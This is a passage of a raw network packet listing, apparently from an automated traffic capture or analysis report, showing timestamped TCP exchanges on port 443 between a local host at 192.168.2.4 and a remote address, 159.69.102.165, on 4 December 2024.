                                                                                                                                                                      Dec 4, 2024 17:05:07.588985920 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589020014 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589035034 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589194059 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589209080 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589225054 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589236975 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589299917 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589319944 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589344978 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589358091 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589409113 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589421034 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589422941 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589438915 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589452982 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589459896 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589503050 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589526892 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589566946 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589584112 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589624882 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589641094 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589656115 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589675903 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589720011 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589750051 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589771032 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589809895 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589848995 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589886904 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.631330967 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.631669044 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.631709099 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.631732941 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.631753922 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.631817102 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.679343939 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.679595947 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.679687023 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.679734945 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.679779053 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.679843903 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.723344088 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.723617077 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.723778963 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.723813057 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.723829031 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.723875999 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771343946 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.771615028 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771653891 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771682978 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771691084 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771708012 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771753073 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.815334082 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.815577984 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.815717936 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.815768957 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.815829992 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.815884113 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.833811998 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.833945990 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.834036112 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.834058046 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.834139109 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.834187984 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.834237099 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.834299088 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.834343910 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.875339985 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.875617981 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.875632048 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.875646114 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.875678062 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.875709057 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.919327021 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.957036018 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.957176924 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.957190990 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.957259893 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.999332905 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.999634981 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.999712944 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.999771118 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.043339968 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.075979948 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.076083899 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.076119900 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.076164007 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.076170921 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.076225996 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.076261997 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.076272011 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.076289892 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.076308966 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.076328993 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.123334885 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.166178942 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.166268110 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.166268110 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.166356087 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.167422056 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.167440891 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.168082952 CET49811443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.168123007 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.168220043 CET49811443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.168473959 CET49811443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.168487072 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.196860075 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.197014093 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.197026968 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.197046995 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.197118044 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.197148085 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.197170019 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.197252035 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.197318077 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.239337921 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.239479065 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.283339977 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.306499004 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.306606054 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.306713104 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.306740046 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.306777954 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.306834936 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.351340055 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.351494074 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.395334959 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.557146072 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.557265043 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.557288885 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.557404041 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.557419062 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.557523012 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.557545900 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.557624102 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.557636023 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.603338957 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.802685022 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.802865028 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.803174019 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.803221941 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.843344927 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:08.844305038 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.844403982 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:08.887336969 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.303879976 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.304097891 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.304450989 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.304516077 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.304547071 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.351332903 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.356965065 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.357032061 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.403331041 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.420545101 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.420736074 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.420820951 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.420877934 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.467341900 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.468867064 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.469058037 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.511343002 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.663685083 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.663794041 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.663815022 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.663846970 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.663882971 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.663945913 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.663963079 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.663974047 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.664082050 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:09.711329937 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.963884115 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:09.963995934 CET49811443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.002232075 CET49811443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.002255917 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.004693985 CET49811443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.004703045 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.019716024 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.019826889 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.019828081 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.019860983 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.019937038 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.019962072 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.019975901 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.020025015 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.020128965 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.020159960 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.020184040 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.063333988 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.265659094 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.265789032 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.265836000 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.265858889 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.265891075 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.265907049 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.265935898 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.265974045 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.265983105 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.266043901 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.266176939 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.266200066 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.307332039 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.615178108 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.615343094 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.615381956 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.615499020 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.659327984 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.659466028 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.703332901 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.865499973 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.865659952 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.865752935 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.865798950 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.865822077 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.911336899 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:10.911483049 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.911636114 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:10.959328890 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.112164974 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.112337112 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.112359047 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.112400055 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.112484932 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.112520933 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.159348011 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.159487009 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.203349113 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.459047079 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.459224939 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.459261894 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.459393024 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.507333040 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.507486105 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.507616997 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.527457952 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.527481079 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.527551889 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.527700901 CET49811443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.528264046 CET49811443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.528284073 CET44349811159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.531435966 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.531481981 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.531570911 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.531806946 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.531826019 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.555332899 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.706312895 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.706495047 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.706562996 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.706700087 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.751327991 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.955662012 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.955869913 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.955899000 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.956013918 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:11.956044912 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:11.956161022 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.003329992 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.200967073 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.201211929 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.201303959 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.201355934 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.201385021 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.247333050 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.247525930 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.247595072 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.291338921 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.444402933 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.444601059 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.444628954 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.444763899 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.491338968 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.491545916 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.535341024 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.683782101 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.684029102 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.684130907 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.684257984 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.684283972 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:12.684360027 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.684433937 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.684489965 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:12.731338024 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.015708923 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.015888929 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.059335947 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.059552908 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.059587002 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.107331991 CET44349805159.69.102.165192.168.2.4
